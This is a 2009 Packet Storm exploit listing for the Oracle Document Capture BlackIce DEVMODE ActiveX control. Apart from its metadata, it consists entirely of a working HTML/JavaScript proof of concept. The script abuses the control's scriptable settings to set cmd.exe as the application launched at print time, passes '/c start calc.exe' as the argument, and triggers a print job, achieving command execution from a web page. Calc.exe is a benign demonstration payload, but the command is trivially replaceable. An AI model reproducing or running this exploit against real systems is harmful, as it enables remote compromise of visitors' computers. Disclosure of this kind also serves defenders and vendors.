Oracle Document Capture BlackIce Command Execution

2009-09-29T00:00:00
ID PACKETSTORM:81716
Type packetstorm
Reporter Nine:Situations:Group::pyrokinesis
Modified 2009-09-29T00:00:00

Description

                                        
                                            `<!-- Oracle Document Capture BlackIce DEVMODE ActiveX Control remote command execution  
  
CLSID: {1503569A-0AE2-4333-B6E6-466AB0BC73E5}  
Progid: BLACKICEDEVMODE.BlackIceDEVMODECtrl.1  
Binary Path: C:\WINDOWS\system32\BlackIceDEVMODE.ocx  
Safe For Initialization (Registry): True  
Safe For Scripting (Registry): True  
-->  
<script language='javascript'>  
  
var BlackIce = new ActiveXObject("BLACKICEDEVMODE.BlackIceDEVMODECtrl.1");  
  
pBlackIceDEVMODE = BlackIce.LoadBlackIceDEVMODE ("Oracle Document Capture");  
  
BlackIce.EnableKeepExistingFiles (pBlackIceDEVMODE);  
BlackIce.EnableStartApplication (pBlackIceDEVMODE);  
BlackIce.EnableStartBeforePrint(pBlackIceDEVMODE);  
BlackIce.SetApplicationPath("c:\\windows\\system32\\cmd.exe",pBlackIceDEVMODE);  
BlackIce.EnablePassParameters(pBlackIceDEVMODE);  
BlackIce.SetStartApplicationParamCode(pBlackIceDEVMODE,1,6);  
BlackIce.SetCustomStartAppParameter(pBlackIceDEVMODE," /c start calc.exe");  
BlackIce.SaveBlackIceDEVMODE("Oracle Document Capture",pBlackIceDEVMODE);  
BlackIce.ControlJob("Oracle Document Capture",1,4); //JOB_CONTROL_PAUSE 1  
//JOB_CONTROL_RESUME 2  
//JOB_CONTROL_RESTART 4  
//JOB_CONTROL_DELETE 5  
</script>  
  
  
`